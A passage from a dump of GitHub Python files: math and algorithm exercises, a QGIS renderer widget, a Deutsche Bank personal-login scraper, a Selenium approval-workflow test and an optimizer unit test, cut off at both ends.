delta, hodge\nfrom sympde.exterior import DifferentialForm\n\n\n\n#==============================================================================\ndef test_exterior_1():\n\n x, y, z = symbols('x y z')\n a = Constant('a')\n n = Symbol('n')\n\n # ...\n u_0 = DifferentialForm('u_0', index=0, dim=n)\n v_0 = DifferentialForm('v_0', index=0, dim=n)\n\n u_1 = DifferentialForm('u_1', index=1, dim=n)\n v_1 = DifferentialForm('v_1', index=1, dim=n)\n\n u_2 = DifferentialForm('u_2', index=2, dim=n)\n v_2 = DifferentialForm('v_2', index=2, dim=n)\n\n u_3 = DifferentialForm('u_3', index=3, dim=n)\n v_3 = DifferentialForm('v_3', index=3, dim=n)\n\n u_n = DifferentialForm('u_n', index=n, dim=n)\n v_n = DifferentialForm('v_n', index=n, dim=n)\n # ...\n\n # ... exterior derivative\n assert(d(d(u_0)) == 0)\n assert(d(u_0+v_0) == d(u_0) + d(v_0))\n assert(d(2*u_0) == 2*d(u_0))\n assert(d(a*u_0+v_0) == a*d(u_0) + d(v_0))\n assert(d(u_n) == 0)\n assert(not(d(u_0) == 0))\n # ...\n\n # ...\n assert(delta(u_0) == 0)\n assert(delta(u_1+v_1) == delta(u_1) + delta(v_1))\n assert(delta(2*u_1) == 2*delta(u_1))\n assert(delta(a*u_1+v_1) == a*delta(u_1) + delta(v_1))\n assert(not(delta(u_n) == 0))\n # ...\n\n # ... exterior product\n print('> ', wedge(u_0, u_1))\n # ...\n\n # ... hodge operator\n print('> ', hodge(u_0))\n # ...\n\n print(hodge(hodge(u_0)))\n print(hodge(hodge(u_1)))\n print(hodge(hodge(u_2)))\n print(hodge(hodge(u_3)))\n\n\n#==============================================================================\n# CLEAN UP SYMPY NAMESPACE\n#==============================================================================\n\ndef teardown_module():\n from sympy.core import cache\n cache.clear_cache()\n\ndef teardown_function():\n from sympy.core import cache\n cache.clear_cache()\n\n#test_exterior_1()\n","repo_name":"pyccel/sympde","sub_path":"sympde/exterior/tests/test_exterior.py","file_name":"test_exterior.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"12970680977","text":"#myPow by Matthew Rothamn\r\n\r\n#define fucntion two variables\r\ndef myPow(x,y):\r\n#since exponents set to 0 = 1 return 1 if this happens\r\n if y == 0:\r\n return 1\r\n#else run recursive exponential function that multiple into itself based on the exponent\r\n else:\r\n return x * myPow(x,y-1)\r\n#input base and exponent\r\nx = int(input(\"enter value for base 'x'\"))\r\ny = int(input(\"enter value for exponenet 'y'\"))\r\n#print\r\nprint(myPow(x,y))\r\n \r\n","repo_name":"MatthewRothman2/For-Resume","sub_path":"githubsubmit/mypow.py","file_name":"mypow.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36135104834","text":"\"\"\"\nYou are given an integer array deck where deck[i] represents the number written on the ith card.\n\nPartition the cards into one or more groups such that:\n\nEach group has exactly x cards where x > 1, and\nAll the cards in one group have the same integer written on them.\nReturn true if such partition is possible, or false otherwise. \n\nExample 1:\n\nInput: deck = [1,2,3,4,4,3,2,1]\nOutput: true\nExplanation: Possible partition [1,1],[2,2],[3,3],[4,4].\nExample 2:\n\nInput: deck = [1,1,1,2,2,2,3,3]\nOutput: false\nExplanation: No possible partition.\n\"\"\"\nclass Solution(object):\n def gdc(self, a, b):\n if a % b == 0:\n return b\n else:\n return self.gdc(b, a % b)\n \n def hasGroupsSizeX(self, deck):\n \"\"\"\n :type deck: List[int]\n :rtype: bool\n \"\"\"\n if len(deck) <= 1:\n return False\n \n uniq = dict()\n for i in deck:\n if i not in uniq:\n uniq[i] = 1\n else:\n uniq[i] += 1\n\n g = uniq[deck[0]]\n\n for v in uniq.values():\n g = self.gdc(g, v)\n print(g)\n if g == 1:\n return False\n\n return True\n \n\nsolution = Solution()\nprint(solution.hasGroupsSizeX([1,2,3,4,4,3,2,1]))\nprint(solution.hasGroupsSizeX([1,1,1,2,2,2,3,3]))\n# print(solution.hasGroupsSizeX([1,1,1,1,2,2,2,2,2,2]))","repo_name":"MeongGanas/leetcode-python","sub_path":"easy/X_of_a_Kind_in_a_Deck_of_Cards.py","file_name":"X_of_a_Kind_in_a_Deck_of_Cards.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72652792168","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThemaMap\n\"\"\"\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nfrom qgis.gui import *\n\nfrom .themamap_renderer import ThemaMapRenderer\nfrom .themamap_utils import layer_attributes\nfrom .ui_themamap import Ui_ThemaMapWidget\nfrom .colortables import colortables as ct\n\nimport resources\n\n\n# ColorButton class from VectorFieldRenderer plugin\n# http://plugins.qgis.org/plugins/VectorFieldRenderer/\n# https://github.com/ccrook/QGIS-VectorFieldRenderer-Plugin\nclass ColorButton( QObject ):\n\n def __init__(self, button):\n QObject.__init__(self)\n self.button = button\n button.clicked.connect(self.clicked)\n\n def color(self):\n return self.button.color()\n\n def setColor(self, color):\n if color.isValid():\n self.button.setColor(color)\n\n def clicked(self):\n self.setColor(QColorDialog.getColor(self.color()))\n\n\ndef string2list(s):\n s = s.replace('/',' ')\n s = s.replace(';',' ')\n s = s.replace(',',' ')\n s = s.replace(' ', ' ')\n l = []\n for el in s.split(' '):\n if len(el) > 0: l.append(el)\n return l\n\n\nclass ThemaMapWidget(QgsRendererV2Widget, Ui_ThemaMapWidget):\n \n choroplethSchemeTypes = ['sequential', 'divergent', 'qualitative']\n \n def __init__(self, layer, style, renderer):\n QgsRendererV2Widget.__init__(self, layer, style)\n if renderer is None or renderer.type() != ThemaMapRenderer.rendererName:\n self.r = ThemaMapRenderer()\n else:\n self.r = renderer\n self.valid = True # can the layer be rendered?\n self.layer = layer\n self.setupUi(self)\n self.buildWidget()\n self.loadUi()\n \n def renderer(self):\n if self.valid: self.applyUi()\n return self.r\n \n def buildWidget(self):\n self.symbolStyleFillColor = ColorButton(self.uSymbolStyleFillColor)\n self.symbolStyleStrokeColor = ColorButton(self.uSymbolStyleStrokeColor)\n self.choroplethFillColor = ColorButton(self.uChoroplethFillColor)\n self.choroplethStrokeColor = ColorButton(self.uChoroplethStrokeColor)\n \n def loadUi(self):\n \"\"\"\n Fills the UI using the values in the renderer.\n \"\"\"\n # prop symbol tab\n self.uPropSymbAttrMenu.clear()\n self.uPropSymbAttrMenu.addItem('')\n for attr in layer_attributes(self.layer):\n self.uPropSymbAttrMenu.addItem(attr)\n if attr == self.r.propsymbol.attr:\n self.uPropSymbAttrMenu.setCurrentIndex(self.uPropSymbAttrMenu.count()-1)\n self.uCalibrationSize.setText(str(self.r.propsymbol.calib_size))\n self.uCalibrationValue.setText(str(self.r.propsymbol.calib_value))\n self.uBias.setText(str(self.r.propsymbol.bias))\n if self.r.propsymbol.symbol == 'circle':\n self.uSymbolShapeSquare.setChecked(False)\n self.uSymbolShapeCircle.setChecked(True)\n else:\n self.uSymbolShapeSquare.setChecked(True)\n self.uSymbolShapeCircle.setChecked(False)\n self.uSymbolFlannery.setChecked(self.r.propsymbol.flannery)\n self.uSymbolStyleFillColor.setColor(self.r.propsymbol.style.fillColor())\n self.uSymbolStyleStrokeColor.setColor(self.r.propsymbol.style.strokeColor())\n self.uSymbolStyleStrokeWidth.setDecimals(2)\n self.uSymbolStyleStrokeWidth.setMinimum(0.0)\n self.uSymbolStyleStrokeWidth.setSingleStep(0.1)\n self.uSymbolStyleStrokeWidth.setValue(self.r.propsymbol.style.strokeWidth)\n # choropleth tab\n self.uChoroplethAttr.clear()\n self.uChoroplethAttr.addItem('')\n for attr in layer_attributes(self.layer):\n self.uChoroplethAttr.addItem(attr)\n self.uChoroplethNClasses.setMinimum(3)\n self.uChoroplethNClasses.setMaximum(12)\n self.uChoroplethNClasses.setValue(len(self.r.choropleth.colors))\n self.uChoroplethSchemeType.setCurrentIndex(\n max(0, self.choroplethSchemeTypes.index(self.r.choropleth.type))\n )\n self.updateChoroplethScheme()\n self.uChoroplethLimits.setText(' '.join(map(str, self.r.choropleth.limits)))\n self.uChoroplethCriticalValue.setText(str(self.r.choropleth.critical_value))\n self.uChoroplethNoData.setText(str(self.r.choropleth.nodata_value))\n self.uChoroplethFillColor.setColor(self.r.choropleth.style.fillColor())\n self.uChoroplethStrokeColor.setColor(self.r.choropleth.style.strokeColor())\n self.uChoroplethStrokeWidth.setValue(self.r.choropleth.style.strokeWidth)\n self.updateUiElements()\n \n def applyUi(self):\n \"\"\"\n Applies the values in the UI to the renderer.\n \"\"\"\n # prop symbol tab\n self.r.propsymbol.attr = str(self.uPropSymbAttrMenu.currentText())\n if self.r.propsymbol.attr == '': self.r.propsymbol.attr = None\n self.r.propsymbol.calib_size = str(self.uCalibrationSize.text())\n self.r.propsymbol.calib_value = str(self.uCalibrationValue.text())\n self.r.propsymbol.bias = str(self.uBias.text())\n if self.uSymbolShapeSquare.isChecked():\n self.r.propsymbol.symbol = 'square'\n else:\n self.r.propsymbol.symbol = 'circle'\n self.r.propsymbol.flannery = self.uSymbolFlannery.isChecked()\n self.r.propsymbol.style.fillColor(self.uSymbolStyleFillColor.color())\n self.r.propsymbol.style.strokeColor(self.uSymbolStyleStrokeColor.color())\n self.r.propsymbol.style.strokeWidth = self.uSymbolStyleStrokeWidth.value()\n # choropleth tab\n self.r.choropleth.attr = str(self.uChoroplethAttr.currentText())\n if self.r.choropleth.attr == '': self.r.choropleth.attr = None\n self.r.choropleth.type = str(self.uChoroplethSchemeType.currentText()).lower()\n # colors are missing here\n self.r.choropleth.limits = string2list(str(self.uChoroplethLimits.text()))\n self.r.choropleth.critical_value = str(self.uChoroplethCriticalValue.text())\n self.r.choropleth.nodata_value = str(self.uChoroplethNoData.text())\n self.r.choropleth.style.fillColor(self.uChoroplethFillColor.color())\n self.r.choropleth.style.strokeColor(self.uChoroplethStrokeColor.color())\n self.r.choropleth.style.strokeWidth = self.uChoroplethStrokeWidth.value()\n \n def updateUiElements(self):\n pass\n \n def updateChoroplethScheme(self):\n schemetype = self.r.choropleth.type.lower()[0:3]\n nclasses = len(self.r.choropleth.colors)\n # remove all current color tables\n while self.uChoroplethScheme.count() > 0:\n self.uChoroplethScheme.removeItem(0)\n for k in ct: # loop over all available color tables\n # create the color scheme icon\n ncols = len(ct[k]['colors'])\n # Impossible to create icons on the fly for some unknown \n # reason. We generate images and load them through the \n # Qt resources file.\n #img = QImage(12*ncols, 24, QImage.Format_RGB32)\n #p = QPainter()\n #p.begin(img)\n #for i in range(ncols):\n # c = ct[k]['colors'][i]\n # p.fillRect(i*12, 0, 12, 24, QColor(c[0], c[1], c[2]))\n #p.end()\n #img.save('/home/ck/src/qgis-themamap/ThemaMap/colortables_icons/'+k+'.png')\n if ncols == nclasses and ct[k]['type'].lower()[0:3] == schemetype:\n ico = QIcon(QPixmap(':plugins/ThemaMap/'+k+'.png', 'png'))\n self.uChoroplethScheme.addItem(ico, ct[k]['name'])\n\n\n\n\n","repo_name":"christiankaiser/ThemaMap","sub_path":"themamap_widget.py","file_name":"themamap_widget.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32190026202","text":"import base64\nimport errno\nimport json\nimport os\nimport re\nfrom pathlib import Path\n\nimport click\nimport mechanicalsoup\n\nfrom banking.credentials import Credentials\n\n\nclass Navigation:\n\n DB_LOGIN_URL = \"https://meine.deutsche-bank.de/trxm/db/init.do\"\n\n def navigate_page(self):\n browser = mechanicalsoup.StatefulBrowser(\n soup_config={'features': 'lxml'},\n raise_on_404=True\n )\n result = browser.open(self.DB_LOGIN_URL)\n\n if result.status_code != 200:\n click.echo(' Überprüfen Sie ihre Internetverbindung.')\n exit()\n\n browser.select_form('form[id=\"loginForm\"]')\n\n page = browser.get_current_page()\n\n branch_tag = page.find('input', attrs={'id': 'branch'})\n account_tag = page.find('input', attrs={'id': 'account'})\n sub_account_tag = page.find('input', attrs={'id': 'subAccount'})\n pin_tag = page.find('input', attrs={'id': 'pin'})\n\n creds = Credentials().get_credentials()\n\n branch = creds['branch']\n account = creds['account']\n sub_account = creds['sub_account']\n pin = click.prompt(' PIN', hide_input=True)\n\n browser[branch_tag['id']] = branch\n browser[account_tag['id']] = account\n browser[sub_account_tag['name']] = sub_account\n browser[pin_tag['id']] = pin\n\n result = browser.submit_selected()\n\n if result.status_code != 200:\n click.echo(' Anmelde Daten sind falsch!')\n exit()\n\n page = browser.get_current_page()\n\n modal_form = page.find(\n 'form', attrs={'id': 'displayNachrichtenboxForm'})\n\n if modal_form:\n browser.select_form('form[id=\"displayNachrichtenboxForm\"]')\n browser.submit_selected()\n\n page = browser.get_current_page()\n\n link = page.find_all('a', attrs={'class': 'visuallyEnhanced'})\n\n result = browser.follow_link(link[0])\n\n page = browser.get_current_page()\n return page\n","repo_name":"ndz-v/cli-banking","sub_path":"banking/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26483850251","text":"kalimat1= input() \r\nkalimat2= input()\r\nnilai1= len(kalimat1) \r\nnilai2= len(kalimat2)\r\nstar= 0 \r\nhastag= 0\r\n\r\nif(nilai1 != nilai2):\r\n print(\"\\nPanjang kalimat berbeda, pesan palsu\")\r\nelse:\r\n print()\r\n for a in range(0, nilai1):\r\n if(kalimat1[a] == kalimat2[a]):\r\n if(kalimat1[a] == ' '):\r\n print(\" \", end='')\r\n else:\r\n print(\"*\", end='') \r\n star += 1\r\n else:\r\n print(\"#\", end='') \r\n hastag += 1\r\n \r\n print(\"\\n* =\", star)\r\n print(\"# =\", hastag)\r\n if star >= hastag :\r\n print(\"Pesan Asli\")\r\n else :\r\n print(\"Pesan Palsu\")","repo_name":"aditokta/Praktikum-Pemrograman1","sub_path":"Modul7/Soal4/PRAK604-2210817110008-Aditya Oktaviari.py","file_name":"PRAK604-2210817110008-Aditya Oktaviari.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11649605841","text":"# map\n\nlist_x = [1,2,3,4,5,6,7,8]\n\nlist_y = [1,2,3,4,5,6]\n\nr1 = map(lambda x: x*x,list_x)\nr2 = map(lambda x,y:x*x+y,list_x,list_y)\n\nprint(list(r1))\nprint(list(r2))","repo_name":"jackmeng/qiyue-python-notes","sub_path":"python入门与进阶/code/12/c3.py","file_name":"c3.py","file_ext":"py","file_size_in_byte":163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15867778660","text":"'''\n测试用例标题:收款账号变更测试\n测试场景:收款账号变更流程测试\n创建者:Tom\n修改者:Tim\n创建日期:2018-7-25\n最后修改日期:2018-11-15\n输入数据:供应商:搭瓦家具公司,审批流程各个角色账号\n输出数据:无\n\n'''\n\n# -*- coding: utf-8 -*-\nimport sys, os\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n# sys.path.append(rootPath)\n\nimport unittest\nfrom cgitb import text\nimport selenium.webdriver.support.ui as ui\nfrom selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport unittest, time, re\nimport time, unittest, configparser\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.common.exceptions import NoSuchElementException\n\nimport random\n\nimport json\n\n'''\n加载配置选项\n'''\ncfg = configparser.ConfigParser()\ncfg.read(rootPath + '/core/config.ini')\n\n'''\n测试用例\n'''\n\n\nclass Refund(unittest.TestCase):\n base_url = cfg.get(\"projects\", \"base_url\")\n project_path = cfg.get(\"projects\", \"project_path\")\n log_path = cfg.get(\"webdriver\", \"log\") + '/' + cfg.get(\"webdriver\", \"logfile\") + '-%s.log' % time.strftime(\n \"%Y-%m-%d %H_%M_%S\")\n\n def loadvendername(self):\n\n global result\n file = open(rootPath + '/data/workflow_FinancialClass_bankaccount_FlowBankAccount.json', encoding='utf-8')\n data = json.load(file)\n result = [(d['username'], d['password']) for d in data['login']]\n\n return result\n\n def loadvendernames(self):\n\n global results\n file = open(rootPath + '/data/workflow_FinancialClass_bankaccount_FlowBankAccount.json', encoding='utf-8')\n data = json.load(file)\n results = [(d['name']) for d in data['use_vendorname']]\n\n return results\n\n def setUp(self):\n # 脚本标识-标题\n self.script_name = '收款账号变更'\n # 脚本标识-ID\n self.script_id = 'workflow_FinancialClass_bankaccount_FlowBankAccount'\n self.target_url = self.base_url + self.project_path\n if (cfg.get(\"webdriver\", \"enabled\") == \"off\"):\n # 如果使用最新firefox需要屏蔽下面这句\n self.driver = webdriver.Firefox()\n else:\n # 如果使用最新firefox需要使用下面这句\n self.driver = webdriver.Firefox(log_path=self.log_path)\n\n self.driver.implicitly_wait(15)\n self.driver.maximize_window()\n self.verificationErrors = []\n self.accept_next_alert = True\n\n # 定义登录方法\n def login(self, username, password):\n self.driver.get(self.target_url) # 登录页面\n self.driver.find_element_by_id('account-inputEl').send_keys(username)\n self.driver.find_element_by_id('password-inputEl').send_keys(password)\n self.driver.find_element_by_xpath(\"//*[@id='LoginWin']//span[contains(@class,'x-btn-icon-el')]\").click()\n\n def test_flow_balance_refund(self):\n\n su = self.loadvendername()\n ad = self.loadvendernames()\n for i in range(0, len(su)):\n print(su[i][0])\n print(su[i][1])\n self.login(su[0][0], su[0][1])\n # self.login('Vic_cn','123')\n sleep(5)\n\n try:\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").is_displayed()\n a = True\n except:\n a = False\n if a == True:\n print(\"元素存在\")\n elif a == False:\n print(\"元素不存在\")\n\n print(a)\n\n if a == True:\n\n # 关闭弹出框\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").click()\n\n else:\n pass\n\n sleep(2)\n\n # 定位到申请单据\n self.driver.find_element_by_xpath(\"//*[@id='appNavTabPanel']//span[contains(@class,'fa-code-fork')]\").click()\n\n sleep(2)\n\n # 定位到财务类\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '财务类')]\").click()\n\n sleep(3)\n\n # 定位到收款账号变更\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '收款账号变更')]\").click()\n\n sleep(2)\n\n # 定位到收款账号变更新建\n self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountView']//span[contains(@class,'fa-plus')]\").click()\n\n sleep(2)\n\n # 选择供应商\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-vendorContainer']//input[@name='main.vendorName']\").click()\n\n sleep(2)\n\n if ad[0] != '':\n\n # 定位到关键字\n self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinSearchPanelID-innerCt']//input[@name='keywords']\").send_keys(ad[0])\n\n sleep(2)\n\n # 点击搜索\n self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinSearchPanelID-innerCt']//span[contains(@class,'fa-search')]\").click()\n\n sleep(2)\n\n _elementFiveth = (random.randint(1, 10))\n\n # 定位供应商\n _elementFirst = self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinGridPanelID-body']//div[contains(text(),'{}')]\".format(_elementFiveth))\n\n print(_elementFirst)\n\n sleep(2)\n\n # 在此元素上双击\n ActionChains(self.driver).double_click(_elementFirst).perform()\n\n else:\n\n _elementFiveth = (random.randint(1, 10))\n\n # 定位供应商\n _elementFirst = self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinGridPanelID-body']//div[contains(text(),'{}')]\".format(_elementFiveth))\n\n print(_elementFirst)\n\n sleep(2)\n\n # 在此元素上双击\n ActionChains(self.driver).double_click(_elementFirst).perform()\n\n sleep(2)\n\n # 公司中文名\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyCnName']\").send_keys('中国')\n\n sleep(2)\n\n # 公司英文名\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyEnName']\").send_keys('CHINA')\n\n sleep(2)\n\n # 公司中文地址\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyCnAddress']\").send_keys('广州')\n\n sleep(2)\n\n # 公司英文地址\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyEnAddress']\").send_keys('GZ')\n\n sleep(2)\n\n # 开户银行\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.beneficiaryBank']\").send_keys('工商银行')\n\n sleep(2)\n\n # 开户银行地址\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.beneficiaryBankAddress']\").send_keys(\n '广州')\n\n sleep(2)\n\n # 账号\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.bankAccount']\").send_keys(\n '6225211001112588')\n\n sleep(2)\n\n # 结算币种\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.currency']\").click()\n\n sleep(2)\n\n # 选择USD\n self.driver.find_element_by_xpath(\"//*[@class='x-list-plain']//li[contains(text(), 'USD')]\").click()\n\n sleep(2)\n\n # 保函\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='guaranteeLetterName']\").click()\n\n sleep(2)\n\n # 定位第一条记录\n _elementSecond = self.driver.find_element_by_xpath(\n \"//*[@id='FilesDialogWinGridPanelID-body']//div[contains(text(), '1')]\")\n\n sleep(2)\n\n # 在此元素上双击\n ActionChains(self.driver).double_click(_elementSecond).perform()\n\n sleep(2)\n\n # 定位到保存\n self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountForm']//span[contains(@class,'fa-save')]\").click()\n\n self.driver.implicitly_wait(60)\n\n sleep(1)\n\n # 定位关键字位置\n ul = self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountViewGridPanelID-body']/div/table/tbody/tr[1]\")\n\n lis = ul.find_elements_by_xpath('td')\n\n for i in range(0, len(lis)):\n\n if su[0][0] in lis[i].text:\n print(i + 1)\n\n column = i + 1\n\n break\n\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewGridPanelID-body']//div[contains(text(), '1')]\").click()\n\n sleep(2)\n\n # 定位到发启按钮\n self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountForm']//span[contains(@class,'fa-play')]\").click()\n\n self.driver.implicitly_wait(60)\n # 获取弹窗提示:\n a = self.driver.find_element_by_css_selector('.x-box-mc').get_attribute('textContent')\n print(a)\n\n # 判断流程\n _prompt = '操作提示流程已启动'\n\n if _prompt in a:\n\n pass\n\n else:\n\n print(\"流程错误\")\n\n self.driver.quit()\n\n _handler = self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewGridPanelID-body']/div/table/tbody/tr[1]/td[{0}]/div\".format(\n column)).get_attribute('textContent')\n\n print(_handler)\n\n for i in range(1, len(su)):\n\n if su[i][0] == _handler:\n _value = su[i][0]\n\n break\n\n self.driver.find_element_by_link_text('注销').click() # 点击注销\n\n self.driver.find_element_by_link_text('是').click()\n\n alert = self.driver.switch_to_alert()\n\n alert.accept() # 退出页面\n\n sleep(5)\n\n '''第一节点'''\n\n if _value == su[1][0]:\n\n self.login(su[1][0], su[1][1])\n # self.login('Vic_cn', '123')\n\n sleep(5)\n\n try:\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").is_displayed()\n a = True\n except:\n a = False\n if a == True:\n print(\"元素存在\")\n elif a == False:\n print(\"元素不存在\")\n\n print(a)\n\n if a == True:\n\n # 关闭弹出框\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").click()\n\n else:\n pass\n\n sleep(2)\n\n # 定位到工作面板\n self.driver.find_element_by_xpath(\"//*[@id='appNavTabPanel']//span[contains(@class,'fa-desktop')]\").click()\n\n sleep(2)\n\n # 定位到待办事项\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '待办事项')]\").click()\n\n sleep(2)\n\n # 定位到待办事项第一条记录\n self.driver.find_element_by_xpath(\"//*[@id='EventsGridPanelID-body']//div[contains(text(), '1')]\").click()\n\n sleep(2)\n\n # 点击马上处理\n self.driver.find_element_by_xpath(\n \"//*[@id='EventsFormPanelID-body']//span[contains(@class, 'x-btn-icon-el')]\").click()\n\n sleep(2)\n\n # 点击通过\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountForm']//span[contains(@class, 'fa-check-square')]\").click()\n\n self.driver.implicitly_wait(60)\n # 获取弹窗提示:\n a = self.driver.find_element_by_css_selector('.x-box-mc').get_attribute('textContent')\n print(a)\n\n _prompt = '操作提示操作成功!'\n\n if _prompt in a:\n\n pass\n\n else:\n\n print(\"流程错误\")\n\n self.driver.quit()\n\n self.driver.find_element_by_link_text('注销').click() # 点击注销\n\n self.driver.find_element_by_link_text('是').click()\n\n alert = self.driver.switch_to_alert()\n\n alert.accept() # 退出页面\n\n sleep(5)\n\n '''第二节点'''\n self.login(su[2][0], su[2][1])\n # self.login('emma', '123')\n\n sleep(5)\n\n try:\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").is_displayed()\n a = True\n except:\n a = False\n if a == True:\n print(\"元素存在\")\n elif a == False:\n print(\"元素不存在\")\n\n print(a)\n\n if a == True:\n\n # 关闭弹出框\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").click()\n\n else:\n pass\n\n sleep(2)\n\n # 定位到工作面板\n self.driver.find_element_by_xpath(\"//*[@id='appNavTabPanel']//span[contains(@class,'fa-desktop')]\").click()\n\n sleep(2)\n\n # 定位到待办事项\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '待办事项')]\").click()\n\n sleep(2)\n\n # 定位到待办事项第一条记录\n self.driver.find_element_by_xpath(\"//*[@id='EventsGridPanelID-body']//div[contains(text(), '1')]\").click()\n\n sleep(2)\n\n # 点击马上处理\n self.driver.find_element_by_xpath(\n \"//*[@id='EventsFormPanelID-body']//span[contains(@class, 'x-btn-icon-el')]\").click()\n\n sleep(2)\n\n # 点击通过\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountForm']//span[contains(@class, 'fa-check-square')]\").click()\n\n self.driver.implicitly_wait(60)\n # 获取弹窗提示:\n a = self.driver.find_element_by_css_selector('.x-box-mc').get_attribute('textContent')\n print(a)\n\n _prompt = '操作提示操作成功!'\n\n if _prompt in a:\n\n pass\n\n else:\n\n print(\"流程错误\")\n\n self.driver.quit()\n\n self.driver.find_element_by_link_text('注销').click() # 点击注销\n\n self.driver.find_element_by_link_text('是').click()\n\n alert = self.driver.switch_to_alert()\n\n alert.accept() # 退出页面\n\n sleep(5)\n\n\n\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"tian848-tim/trunk","sub_path":"case/workflow_FinancialClass_bankaccount_FlowBankAccount/workflow_FinancialClass_bankaccount_FlowBankAccount.py","file_name":"workflow_FinancialClass_bankaccount_FlowBankAccount.py","file_ext":"py","file_size_in_byte":15377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2187813294","text":"from allennlp.common.testing import AllenNlpTestCase\nimport torch\n\nfrom kglm.training.nt_asgd import NTASGDOptimizer, NTASGDScheduler\n\n\nclass NTASGDOptimizerTest(AllenNlpTestCase):\n def setUp(self):\n self.dim = 10\n self.model = torch.nn.Linear(10, 10)\n self.optim = NTASGDOptimizer(self.model.parameters(),\n lr=30.0,\n weight_decay=1.2e-6)\n super().setUp()\n\n def test_trigger(self):\n # Active optimizer should be SGD before triggering\n assert self.optim.active_optimizer == self.optim._sgd\n assert not self.optim.triggered\n # Active optimizer should be ASGD after triggering\n self.optim.trigger()\n assert self.optim.active_optimizer == self.optim._asgd\n assert self.optim.triggered\n\n def test_awd_lstm_magic_trick(self):\n # Here we verify we can replicate the confusing trick done in:\n # github.com/salesforce/awd-lstm-lm/main.py 244-260\n\n # We need to be in asgd mode.\n self.optim.trigger()\n\n # Perform a couple iterations of \"training\".\n for _ in range(3):\n self.optim.zero_grad()\n x = torch.randn(1, 10)\n y_hat = self.model(x)\n y_true = torch.randn(1, 10)\n loss = (y_hat - y_true).pow(2).mean()\n loss.backward()\n self.optim.step()\n\n # Now for the trick: assign the model parameters to the asgd average during evaluation.\n tmp = {}\n for prm in self.model.parameters():\n tmp[prm] = prm.data.clone()\n prm.data = self.optim.active_optimizer.state[prm]['ax'].clone()\n\n # HERE IS WHERE WE WOULD EVALUATE\n\n # Once we're done evaluating we reset the params for training\n for prm in self.model.parameters():\n prm.data = tmp[prm].clone()\n\n\nclass 